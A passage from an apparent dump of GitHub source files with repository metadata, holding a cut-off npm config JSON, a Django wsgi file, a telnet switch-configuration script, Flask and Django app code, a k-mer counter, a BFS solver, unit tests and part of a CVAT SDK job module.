"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_gyp_path": "tools/icu/icu-system.gyp",
"icu_small": "false",
"icu_ver_major": "67",
"is_debug": 0,
"llvm_version": "12.0",
"napi_build_version": "7",
"node_byteorder": "little",
"node_debug_lib": "false",
"node_enable_d8": "false",
"node_install_npm": "false",
"node_module_version": 83,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local/Cellar/node/14.13.0",
"node_release_urlbase": "",
"node_shared": "false",
"node_shared_brotli": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_target_type": "executable",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_node_code_cache": "true",
"node_use_node_snapshot": "true",
"node_use_openssl": "true",
"node_use_v8_platform": "true",
"node_with_ltcg": "false",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_is_fips": "false",
"ossfuzz": "false",
"shlib_suffix": "83.dylib",
"target_arch": "x64",
"v8_enable_31bit_smis_on_64bit_arch": 0,
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_enable_lite_mode": 0,
"v8_enable_object_print": 1,
"v8_enable_pointer_compression": 0,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 1,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_siphash": 1,
"want_separate_host_toolset": 0,
"xcode_version": "12.0",
"nodedir": "/Users/ilyesta/Library/Caches/node-gyp/14.13.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/zsh",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/ilyesta/.npm-init.js",
"userconfig": "/Users/ilyesta/.npmrc",
"cidr": "",
"node_version": "14.13.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"before": "",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/ilyesta/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"fund": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.14.8 node/v14.13.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/vz/s9x6prmd6wx2n9r5xdcmfpcr0000gp/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"format_package_lock": "true",
"link": ""
}
}
|
[
"ilyesta@tv.home"
] |
ilyesta@tv.home
|
1b428c6ad3ee2b764e07fa843b655e12c297c4ea
|
ec8de5a02d21039378b3ec2ad6fedaa19a687848
|
/wedding-api/wsgi.py
|
f99079dfcd6bc184960f72d6001b854538b1056b
|
[] |
no_license
|
jmteachw/wedding-api
|
5ab3e57a0c9a472153bf6363f8cfe3f2481213bb
|
a54a984a6814ac15391c4a3bf4db370a452cab9d
|
refs/heads/master
| 2021-01-12T07:48:14.209675
| 2017-01-18T06:50:20
| 2017-01-18T06:50:20
| 77,021,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for wedding-website project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wedding-api.settings")
application = get_wsgi_application()
|
[
"jmteachw@gmail.com"
] |
jmteachw@gmail.com
|
def49f0d082ac8dd74588d5dc0c9db9abd6c2ae3
|
cc24b10be9777e468a1f28fed3a31c69c196be75
|
/noShut.py
|
6eca8c0fa702765fe29eb0d26c358831d165d94c
|
[] |
no_license
|
aragon217/FYP2
|
96e0b50cd7eabcdc1d4e092fc79e3c69d569a33c
|
a6c3530c7096e46eb32aa4f89cafe443e5dc5c6f
|
refs/heads/master
| 2022-09-08T02:58:05.539589
| 2020-05-31T05:25:47
| 2020-05-31T05:25:47
| 268,211,119
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
import telnetlib
HOST = "192.168.0.253"
user = "openmsa"
password = "openmsa"
tn = telnetlib.Telnet(HOST)
tn.read_until("Username: ")
tn.write(user + "\n")
if password:
tn.read_until("Password: ")
tn.write(password + "\n")
tn.write("enable\n")
tn.write("openmsa\n")
tn.write("conf t\n")
tn.write("int range f0/1-48\n")
tn.write("no shutdown\n")
tn.write("end\n")
tn.write("exit\n")
output2 = tn.read_all()
print output2
|
[
"noreply@github.com"
] |
aragon217.noreply@github.com
|
ac1e65d6ba22327dfbba49ea03abaa36615b3d8c
|
71e5024bc713ff00cd844c6ddfd077facaf3b4b9
|
/bin/rst2pseudoxml.py
|
875e97baaba33c562eddd23c147e0d64d87a0e00
|
[] |
no_license
|
jonathanbglass/cloudauditor
|
a3fb11d418ec6a081950e51b5c8235aafb6e7f78
|
af8785d706769c0e91d95fbb2669784ed12c14bd
|
refs/heads/master
| 2022-08-20T00:56:08.631504
| 2022-08-01T18:53:01
| 2022-08-01T18:53:01
| 118,145,645
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
#!/Users/jonathanglass/Documents/GitHub/cloud-auditor/bin/python3
# $Id: rst2pseudoxml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing pseudo-XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates pseudo-XML from standalone reStructuredText '
'sources (for testing purposes). ' + default_description)
publish_cmdline(description=description)
|
[
"jonathan.glass@gmail.com"
] |
jonathan.glass@gmail.com
|
0c1fb16b5f3f3ba3bb88adf40b93e17a430c3e47
|
1bedf297e77b78a43fa375eb11651620b009941b
|
/liumin_kmer_counting.py
|
aa3eacdf7a1b33b4a243dfb58ef298e13a51f971
|
[] |
no_license
|
JM-SONG/CommonScript
|
28ee9a2cde8bcc91a884b526e6150bb8cc40df8a
|
d4ba0a7495b7b34d2348a1454bf724dbb5d8a00c
|
refs/heads/master
| 2022-12-05T00:31:29.783959
| 2020-08-25T01:05:36
| 2020-08-25T01:05:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,565
|
py
|
#!/usr/bin/python
"""
disk limit= 200Mb && memory limit= 1Mb
how to run this program: python liumin_kmer_counting.py inputfile > outputfile
i don't know how to calculate time and space complexity.
the memory usage is about 8 Mb,
a little higher than your requirement of 1Mb.
"""
import os
import re
import time
from sys import argv
from itertools import islice
from memory_profiler import profile
####input data and calculate nlist,nsublist
infile=open(argv[1],'r')
line=infile.readline()
(k,n,q)=line.strip().split()
nl=2*int(k)*int(n)/(200*10**6)+1
ns=int(200*(2*int(k)+32)/(0.7*2*int(k)))+1
###define dicta,dictb for seq and binary convert
dicta={'a' : '00',
'c' : '01',
'g' : '10',
't' : '11',
}
dictb=dict(map(lambda t:(t[1],t[0]), dicta.items()))
def seq_to_binary(sequence):
base=list(sequence)
binary=''
for char in base:
binary="".join([binary,dicta[char]])
return binary
def binary_to_sequence(binary):
bin_list=re.findall('.{2}',binary)
sequence=''
for char in bin_list:
sequence="".join([sequence,dictb[char]])
return sequence
@profile
###jellyfish algorithm: kmer-counting and hashEntry
def kmer_counting(sublist):
H={}
count={}
for kmer in sublist:
kmer=kmer.strip()
i=hashEntry(kmer,H)
if i in H:
count[i]+=1
else:
H[i]=kmer
count[i]=1
return H,count
def hashEntry(kmer,H):
i=int(kmer,2)%7
while i in H and H[i] != kmer:
i = (i+1)%7;
return i
####DSK algorithm and output count
for i in range(0,nl):
for line in islice(infile,0,None):
kmer=line.strip()
if kmer != '' and kmer.find('n') < 0:
if int(seq_to_binary(kmer),2)%nl == i:
j=(int(seq_to_binary(kmer),2)/nl)%ns
f=open('tempfile'+str(i)+str(j)+'.txt','a+')
f.write(seq_to_binary(kmer)+'\n')
f.close()
for j in range (0,ns):
if os.path.exists('tempfile'+str(i)+str(j)+'.txt'):
temp=open('tempfile'+str(i)+str(j)+'.txt','r')
sublist=temp.readlines()
(H,count)=kmer_counting(sublist)
for char in H:
if count[char] >= int(q):
print str(count[char])+' '+binary_to_sequence(H[char])
temp.close()
os.remove('tempfile'+str(i)+str(j)+'.txt')
print time.clock()
infile.close()
|
[
"noreply@github.com"
] |
JM-SONG.noreply@github.com
|
3e0338ea79cadaaa033b19f89912a98516766a16
|
47c9aa780be7a08acf40eb24d72b8c801251692b
|
/rango1/urls.py
|
72a7a6df9f9ef9d9f707c791d59efe330d35e6e6
|
[] |
no_license
|
rashmigj/tango_with_django
|
3643323bd713325ec63c93267cfc4ffa78f84083
|
2d510f124aa91bd32690d29a001d029199c85a13
|
refs/heads/master
| 2016-09-05T22:22:47.940730
| 2015-01-04T15:04:04
| 2015-01-04T15:04:04
| 28,739,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
from django.conf.urls import patterns, url
from rango1 import views
urlpatterns = patterns('',
url(r'^$', views.index,name='index'),
url(r'^$',views.about,name='about'))
|
[
"grashmi033@gmail.com"
] |
grashmi033@gmail.com
|
f4cee504154a3351775c06de6e22a4212988559f
|
33a50bb13812090a36257078522b798762978c66
|
/cron/test_shell.py
|
9a9c93cabc353d977c3d9190769ca1f8e911b557
|
[] |
no_license
|
aa3632840/quanlin
|
52ac862073608cd5b977769c14a7f6dcfb556678
|
2890d35fa87367d77e295009f2d911d4b9b56761
|
refs/heads/master
| 2021-01-10T22:05:14.076949
| 2014-10-25T02:28:15
| 2014-10-25T02:28:15
| 23,178,087
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 455
|
py
|
from django_cron import CronJobBase, Schedule
from django.utils import timezone
class MyCronJob(CronJobBase):
RUN_EVERY_MINS = 0.01 # every 2 hours
MIN_NUM_FAILURES = 1
schedule = Schedule(run_every_mins=RUN_EVERY_MINS)
code = 'cron.my_cron_job' # a unique code
def do(self):
cur_time = timezone.datetime.now()
print cur_time
# open('orcn.job','a').write(cur_time)
# pass # do your thing here
|
[
"262708239@qq.com"
] |
262708239@qq.com
|
b03101e01ea2f609fc8ed3698be1e5a1f2bd4d05
|
5650fa4c2fc3d1758f942695e2fb16d41fb29729
|
/build/env/bin/avro
|
0ba2ade604e38488f27440b86c727e60b000bd16
|
[] |
no_license
|
2CloudMan/cloudbim
|
9c0453bf06488c19d76559d0c49e7379cca41408
|
9cb19ace35fa4eefd0be022aa81d2f9d8741b801
|
refs/heads/master
| 2021-01-18T20:21:45.964969
| 2015-06-05T10:42:55
| 2015-06-05T10:42:55
| 32,972,220
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
#!/home/linmiancheng/workplace/hue/build/env/bin/python2.7
# EASY-INSTALL-SCRIPT: 'avro==1.7.6','avro'
__requires__ = 'avro==1.7.6'
import pkg_resources
pkg_resources.run_script('avro==1.7.6', 'avro')
|
[
"linmiancheng@gmail.com"
] |
linmiancheng@gmail.com
|
|
a54520cdd4fddc633ac22c39ffd1aa72ee4c1608
|
e0c54f49f06d012a646c2d697407799246621193
|
/data/parsers/reqparse.py
|
76ce74c8fc0ab0bd8e3870085e04427ae4d118dc
|
[] |
no_license
|
PereverzevIvan/WEB.-REST-API.-Flask-restful
|
f27a672d323be2b8c5f69e0ce4f1c9a707ed5f38
|
6532526cff999ea5b268ed5c11dce8cf10b13f48
|
refs/heads/master
| 2023-04-14T13:18:20.272670
| 2021-04-25T07:06:35
| 2021-04-25T07:06:35
| 361,356,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 338
|
py
|
from flask_restful import reqparse
parser = reqparse.RequestParser()
parser.add_argument('title', required=True)
parser.add_argument('content', required=True)
parser.add_argument('is_private', required=True, type=bool)
parser.add_argument('is_published', required=True, type=bool)
parser.add_argument('user_id', required=True, type=int)
|
[
"peregh320@gmail.com"
] |
peregh320@gmail.com
|
9abe33a607c5ae88af71aa7a742d0b3f593e3597
|
1719920a92f7194766624474b98d59ef8d6eddaf
|
/models/media_content_rating_france.py
|
8675202caaa97ccbeaea25f8787eb1a16fa455e4
|
[
"MIT"
] |
permissive
|
MIchaelMainer/msgraph-v10-models-python
|
cfa5e3a65ba675383975a99779763211ed9fa0a9
|
adad66363ebe151be2332f3ef74a664584385748
|
refs/heads/master
| 2020-03-19T12:51:06.370673
| 2018-06-08T00:16:12
| 2018-06-08T00:16:12
| 136,544,573
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,116
|
py
|
# -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..model.rating_france_movies_type import RatingFranceMoviesType
from ..model.rating_france_television_type import RatingFranceTelevisionType
from ..one_drive_object_base import OneDriveObjectBase
class MediaContentRatingFrance(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def movie_rating(self):
"""
Gets and sets the movieRating
Returns:
:class:`RatingFranceMoviesType<onedrivesdk.model.rating_france_movies_type.RatingFranceMoviesType>`:
The movieRating
"""
if "movieRating" in self._prop_dict:
if isinstance(self._prop_dict["movieRating"], OneDriveObjectBase):
return self._prop_dict["movieRating"]
else :
self._prop_dict["movieRating"] = RatingFranceMoviesType(self._prop_dict["movieRating"])
return self._prop_dict["movieRating"]
return None
@movie_rating.setter
def movie_rating(self, val):
self._prop_dict["movieRating"] = val
@property
def tv_rating(self):
"""
Gets and sets the tvRating
Returns:
:class:`RatingFranceTelevisionType<onedrivesdk.model.rating_france_television_type.RatingFranceTelevisionType>`:
The tvRating
"""
if "tvRating" in self._prop_dict:
if isinstance(self._prop_dict["tvRating"], OneDriveObjectBase):
return self._prop_dict["tvRating"]
else :
self._prop_dict["tvRating"] = RatingFranceTelevisionType(self._prop_dict["tvRating"])
return self._prop_dict["tvRating"]
return None
@tv_rating.setter
def tv_rating(self, val):
self._prop_dict["tvRating"] = val
|
[
"mmainer@microsoft.com"
] |
mmainer@microsoft.com
|
2e672049167250d9c0ec7bb4b0659a8991fb65f1
|
565548ff49844ed69ae16d5104e500f01c973402
|
/app/public/__init__.py
|
4bff15b2e7e74f5ac529b2953da9c4906c389912
|
[] |
no_license
|
jaisenbe58r/Pebrassos
|
159ce5a8b372590fd9368d9b5b3c1b0513895bba
|
7516a1f7bbba78547af86a9858ee381224964d28
|
refs/heads/master
| 2023-02-27T05:42:50.652697
| 2021-01-31T20:57:59
| 2021-01-31T20:57:59
| 299,698,630
| 3
| 1
| null | 2021-01-31T20:58:01
| 2020-09-29T18:04:36
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""Copyright (c) 2020 Jaime Sendra Berenguer & Carlos Mahiques Ballester
Pebrassos - Machine Learning Library Extensions
Author:Jaime Sendra Berenguer & Carlos Mahiques Ballester
<www.linkedin.com/in/jaisenbe>
License: MIT
FECHA DE CREACIÓN: 24/05/2019
"""
from flask import Blueprint
public_bp = Blueprint('public', __name__, template_folder='templates')
from . import routes
|
[
"jsendra@autis.es"
] |
jsendra@autis.es
|
bb3a596fe8a8d6301b6a67454377963e4c115404
|
daf916c1bf36798163dcae61c9ac6632ff698d1e
|
/그래프/6087.py
|
d683ddd93310c7caf7985368cc36124710715798
|
[] |
no_license
|
Chockchockhancookie/Algorithm
|
c9175163cb2f135a869a43ccb4c084f96fb4a112
|
7c50352349cabf5a89d15fb354ffd9d6967764c0
|
refs/heads/master
| 2023-08-14T01:00:25.755088
| 2021-09-14T14:41:35
| 2021-09-14T14:41:35
| 375,382,867
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,616
|
py
|
from collections import deque
import sys
input = sys.stdin.readline
INF = int(1e9)
def bfs(x, y):
distance = [[INF] * m for _ in range(n)]
distance[x][y] = 0
queue = deque()
queue.append((x, y, 9, 0))
while queue:
a, b, direct, count = queue.popleft()
for i in range(4):
nx = a + dx[i]
ny = b + dy[i]
if 0 <= nx < n and 0 <= ny < m and graph[nx][ny] != "*":
if i != direct:
if direct == 9:
cost = count
if cost <= distance[nx][ny]:
distance[nx][ny] = cost
queue.append((nx, ny, i, cost))
cost = count + 1
if cost <= distance[nx][ny]:
distance[nx][ny] = cost
queue.append((nx, ny, i, cost))
else:
cost = count
if cost <= distance[nx][ny]:
distance[nx][ny] = cost
queue.append((nx, ny, i, cost))
return distance
m, n = map(int, input().split())
start_x, start_y = -1, -1
end_x, end_y = -1, -1
graph = []
for i in range(n):
tmp = list(input().rstrip())
graph.append(tmp)
for j in range(m):
if tmp[j] == "C":
if start_x == -1:
start_x, start_y = i, j
else:
end_x, end_y = i, j
dx = [1, 0, -1, 0]
dy = [0, -1, 0, 1]
answer = bfs(start_x, start_y)
if answer[end_x][end_y] == INF:
print(0)
else:
print(answer[end_x][end_y])
|
[
"mellow3632@naver.com"
] |
mellow3632@naver.com
|
d4485078cbfce8f4b623cb39389f6e95a6c819a9
|
2b32e6768855670b0f063ae489259b141b154174
|
/products/views.py
|
2ce82b4459ea658e679973334b5e5a2c06e392ef
|
[] |
no_license
|
mahinm20/Product-Hunt-Clone
|
22f749316f56f813f98e078b3f17769234cbecf0
|
1e1a848537f38fa80d484eb59d923387d3c585f5
|
refs/heads/master
| 2021-05-26T11:31:43.887425
| 2020-04-08T14:56:01
| 2020-04-08T14:56:01
| 254,114,222
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,895
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth.decorators import login_required
from .models import Product
from django.utils import timezone
# Create your views here.
def home(request):
products= Product.objects
return render(request,'products/home.html',{'products':products})
""" @login_required
def create(request):
if request.method == 'POST':
if request.POST['title'] and request.POST['body'] and request.POST['url'] and request.FILES['icon'] and request.FILES['images']:
product = Product()
product.body = request.POST['body']
product.title = request.POST['title']
if request.POST['url'].startswith('http://') or request.POST['url'].startswith('https://'):
product.url = request.POST['url']
else:
product.url = 'http://' + request.POST['url']
product.icon = request.FILES['icon']
product.image = request.FILES['images']
product.pub_date = timezone.datetime.now()
product.hunter = request.user
product.save()
return redirect('home')
else:
return render(request,'products/create.html',{'error':'All fields are required!'})
return render(request,'products/create.html') """
@login_required(login_url='/accounts/signup')
def create(request):
if request.method == 'POST':
if request.POST['title'] and request.POST['body'] and request.POST['url'] and request.FILES['icon'] and request.FILES['image']:
product = Product()
product.title = request.POST['title']
product.body = request.POST['body']
if request.POST['url'].startswith('http://') or request.POST['url'].startswith('https://'):
product.url = request.POST['url']
else:
product.url = 'http://' + request.POST['url']
product.icon = request.FILES['icon']
product.image = request.FILES['image']
product.pub_date = timezone.datetime.now()
product.hunter = request.user
product.save()
return redirect('/products/' + str(product.id))
#return redirect('home')
else:
return render(request, 'products/create.html',{'error':'All fields are required.'})
else:
return render(request, 'products/create.html')
def detail(request,product_id):
product=get_object_or_404(Product,pk=product_id)
return render(request,'products/detail.html',{'product':product})
@login_required(login_url='/accounts/signup')
def upvote(request,product_id):
if request.method == 'POST':
product=get_object_or_404(Product,pk=product_id)
product.total_votes +=1
product.save()
return redirect('/products/' + str(product.id))
|
[
"mahinmalhotra20@gmail.com"
] |
mahinmalhotra20@gmail.com
|
de9ac930786b7d2b59650281ba254b3487f336a7
|
dce4dc9a1901e70a762af3fc29e977bd90f7fb43
|
/src/readfiletest.py
|
9eebc80701a2484c1078e7383a4760c4da116dbc
|
[] |
no_license
|
helenahilander/data-visualization-gui
|
1d39d5819b8ff70640db82f9dbc1ce710e2f7029
|
484cacb05c01cb4e3d66861533bc2bef785ccb39
|
refs/heads/master
| 2020-09-07T00:55:10.716957
| 2019-11-13T10:14:05
| 2019-11-13T10:14:05
| 220,608,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,905
|
py
|
"""
The module explainded:
readfiletest.py is a module for testing the ReadFile class unvalid file formats.
"""
import unittest
from io import StringIO
from datareadingerror import DataReadingError
from readfile import ReadFile
class Test(unittest.TestCase):
#testing with a header without #
#testing that DataReadingError is raised with unvalid file
def test_1(self):
self.input_file = StringIO()
self.input_file.write(' data1\n')
self.input_file.write('x,y\n#float,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects( self.input_file)
self.input_file.close()
#testing with unvalid #x_name,y_name row
#testing that DataReadingError is raised with unvalid file
def test_2(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('x,y\n#float,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
#testing with unvalid #x_type, y_type row
#testing that DataReadingError is raised with unvalid file
def test_3(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('#x,y\nfloat,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
#testing with unvalid #x_name
#testing that DataReadingError is raised with unvalid file
def test_4(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('x\n#float\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
#invalid data_type with x data
#testing that DataReadingError is raised with unvalid file
def test_5(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('#x\nfloat\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
#tests if the created Data object has rigth attributes
def test_6(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('#x,y\n#float,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30\n')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
self.assertEqual( data_list[0].data_length, 8)
self.assertEqual(data_list[0].x_name, "x")
self.assertEqual(data_list[0].y_name, "y")
self.assertEqual(data_list[0].number_of_decimals, 2)
self.assertEqual( data_list[0].data_type, "doublenum")
self.assertEqual( data_list[0].data_title, "data1")
self.assertEqual(type(data_list[0].x[1]), type(0.2))
self.assertEqual(type(data_list[0].y[1]), type(0.2))
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
helenahilander.noreply@github.com
|
07d604687d9869027af164e421711abf029e911e
|
1f71f4e41c6aa789f7f5481bc369b852f9ac8eab
|
/cvat-sdk/cvat_sdk/core/proxies/jobs.py
|
4c6047edf883f80cfa84967319f5e596bb0fdec7
|
[
"MIT",
"LGPL-2.0-or-later",
"GPL-1.0-or-later"
] |
permissive
|
shalevy1/cvat
|
2c7e041fa4c8b9a5166894b3ae5e7c28df5d8ae3
|
912e47e56c772eb6c2fb5b32f898b029a985fdfc
|
refs/heads/develop
| 2023-02-13T23:05:15.428038
| 2023-02-08T16:08:52
| 2023-02-08T16:08:52
| 200,596,810
| 0
| 0
|
MIT
| 2023-01-27T08:48:21
| 2019-08-05T06:39:24
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 5,516
|
py
|
# Copyright (C) 2022-2023 CVAT.ai Corporation
#
# SPDX-License-Identifier: MIT
from __future__ import annotations
import io
import mimetypes
from pathlib import Path
from typing import TYPE_CHECKING, List, Optional, Sequence
from PIL import Image
from cvat_sdk.api_client import apis, models
from cvat_sdk.core.downloading import Downloader
from cvat_sdk.core.helpers import get_paginated_collection
from cvat_sdk.core.progress import ProgressReporter
from cvat_sdk.core.proxies.annotations import AnnotationCrudMixin
from cvat_sdk.core.proxies.issues import Issue
from cvat_sdk.core.proxies.model_proxy import (
ModelListMixin,
ModelRetrieveMixin,
ModelUpdateMixin,
build_model_bases,
)
from cvat_sdk.core.uploading import AnnotationUploader
if TYPE_CHECKING:
from _typeshed import StrPath
_JobEntityBase, _JobRepoBase = build_model_bases(
models.JobRead, apis.JobsApi, api_member_name="jobs_api"
)
class Job(
models.IJobRead,
_JobEntityBase,
ModelUpdateMixin[models.IPatchedJobWriteRequest],
AnnotationCrudMixin,
):
_model_partial_update_arg = "patched_job_write_request"
_put_annotations_data_param = "job_annotations_update_request"
def import_annotations(
self,
format_name: str,
filename: StrPath,
*,
status_check_period: Optional[int] = None,
pbar: Optional[ProgressReporter] = None,
):
"""
Upload annotations for a job in the specified format (e.g. 'YOLO ZIP 1.0').
"""
filename = Path(filename)
AnnotationUploader(self._client).upload_file_and_wait(
self.api.create_annotations_endpoint,
filename,
format_name,
url_params={"id": self.id},
pbar=pbar,
status_check_period=status_check_period,
)
self._client.logger.info(f"Annotation file '{filename}' for job #{self.id} uploaded")
def export_dataset(
self,
format_name: str,
filename: StrPath,
*,
pbar: Optional[ProgressReporter] = None,
status_check_period: Optional[int] = None,
include_images: bool = True,
) -> None:
"""
Download annotations for a job in the specified format (e.g. 'YOLO ZIP 1.0').
"""
filename = Path(filename)
if include_images:
endpoint = self.api.retrieve_dataset_endpoint
else:
endpoint = self.api.retrieve_annotations_endpoint
Downloader(self._client).prepare_and_download_file_from_endpoint(
endpoint=endpoint,
filename=filename,
url_params={"id": self.id},
query_params={"format": format_name},
pbar=pbar,
status_check_period=status_check_period,
)
self._client.logger.info(f"Dataset for job {self.id} has been downloaded to {filename}")
def get_frame(
self,
frame_id: int,
*,
quality: Optional[str] = None,
) -> io.RawIOBase:
(_, response) = self.api.retrieve_data(
self.id, number=frame_id, quality=quality, type="frame"
)
return io.BytesIO(response.data)
def get_preview(
self,
) -> io.RawIOBase:
(_, response) = self.api.retrieve_preview(self.id)
return io.BytesIO(response.data)
def download_frames(
self,
frame_ids: Sequence[int],
*,
outdir: StrPath = ".",
quality: str = "original",
filename_pattern: str = "frame_{frame_id:06d}{frame_ext}",
) -> Optional[List[Image.Image]]:
"""
Download the requested frame numbers for a job and save images as outdir/filename_pattern
"""
# TODO: add arg descriptions in schema
outdir = Path(outdir)
outdir.mkdir(parents=True, exist_ok=True)
for frame_id in frame_ids:
frame_bytes = self.get_frame(frame_id, quality=quality)
im = Image.open(frame_bytes)
mime_type = im.get_format_mimetype() or "image/jpg"
im_ext = mimetypes.guess_extension(mime_type)
# FIXME It is better to use meta information from the server
# to determine the extension
# replace '.jpe' or '.jpeg' with a more used '.jpg'
if im_ext in (".jpe", ".jpeg", None):
im_ext = ".jpg"
outfile = filename_pattern.format(frame_id=frame_id, frame_ext=im_ext)
im.save(outdir / outfile)
def get_meta(self) -> models.IDataMetaRead:
(meta, _) = self.api.retrieve_data_meta(self.id)
return meta
def get_frames_info(self) -> List[models.IFrameMeta]:
return self.get_meta().frames
def remove_frames_by_ids(self, ids: Sequence[int]) -> None:
self._client.api_client.tasks_api.jobs_partial_update_data_meta(
self.id,
